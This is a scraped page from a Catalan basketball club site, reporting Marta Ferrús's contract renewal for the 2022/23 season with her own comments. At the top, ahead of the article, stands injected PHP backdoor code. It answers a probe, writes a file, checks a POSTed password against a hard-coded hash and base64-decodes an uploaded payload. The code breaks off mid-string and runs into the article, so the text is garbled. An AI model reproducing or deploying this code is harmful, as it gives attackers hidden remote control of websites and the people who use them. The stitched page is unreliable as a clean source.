function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Marta Ferrús renovada una temporada més! - Tgn Bàsquet Club -

Marta Ferrús renovada una temporada més!

By
Updated: juliol 1, 2022

La Marta Ferrús seguirà una temporada més al club Lila i s’uneix al grup de renovades per a la temporada 22/23 del Sènior de Copa Catalunya. D’aquesta manera, el nou tècnic Marc Rovirosa s’assegura la continuïtat de la pivot un curs més. Cal destacar que la Marta és la tercera renovació oficial després d’anunciar la continuïtat de la Laura Pascual i Judit Garcia.

El curs vinent serà la segona temporada de la Marta al Sènior del TGN Bàsquet, després del seu retorn al club. La número 13 explica els motius de la seva renovació amb el conjunt Lila: ”He decidit renovar perquè el projecte continua i el volem consolidar a la màxima categoria catalana. Tot i que el Víctor Neila no segueixi com a entrenador, que és qui va confiar en mi per tornar a jugar a Copa amb el TGN, el Marc m’ha transmès molta energia i confiança de cara la temporada vinent per a continuar competint al màxim nivell i poder superar els èxits obtinguts la temporada anterior.”

Sobre els objectius que es marca per la temporada 22/23: ”Espero continuar millorant com equip i treballar el màxim per així poder assolir els objectius que ens marquem.” Finalment, ens descriu el famós #ADNTGN: ”És la família, la dedicació, el treball i l’amor per aquests colors.”

Foto de: nbsphoto

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *